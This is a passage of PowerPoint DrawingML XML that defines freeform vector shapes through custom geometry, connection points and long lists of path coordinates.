                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="19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2" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="4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11"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5033" y="1656"/>
              <a:ext cx="141" cy="186"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="10" y="144"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="161"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="178"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="194"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="228"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="245"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="262"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="281"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="29" y="296"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="50" y="319"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="331"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="78" y="340"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="352"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="365"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="371"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="367"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="355"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="338"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="317"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="206" y="298"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="215" y="283"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="225" y="268"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="253"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="242" y="237"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="253" y="218"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="268" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="276" y="175"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="282" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="272" y="163"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="251" y="154"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="140"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="215" y="131"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="188" y="110"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="169" y="85"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="154" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="154" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="54" y="97"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="114"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="140"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="282" h="371">
                  <a:moveTo>
                    <a:pt x="10" y="142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="20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2" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="142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5220" y="1635"/>
              <a:ext cx="162" cy="129"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="45" y="40"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="66"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="112"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="137"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="5" y="163"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="184"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="24" y="201"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="213"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="222"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="70" y="232"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="87" y="239"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="106" y="245"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="251"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="144" y="255"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="165" y="255"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="184" y="255"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="249"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="220" y="241"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="239" y="232"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="256" y="222"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="273" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="296" y="194"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="315" y="177"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="323" y="171"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="315" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="296" y="163"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="270" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="245" y="144"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="224" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="211" y="108"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="201" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="188" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="186" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="178" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="157" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="140" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="119" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="100" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="81" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="66" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="34"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="323" h="257">
                  <a:moveTo>
                    <a:pt x="53" y="34"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120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6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="232"/>
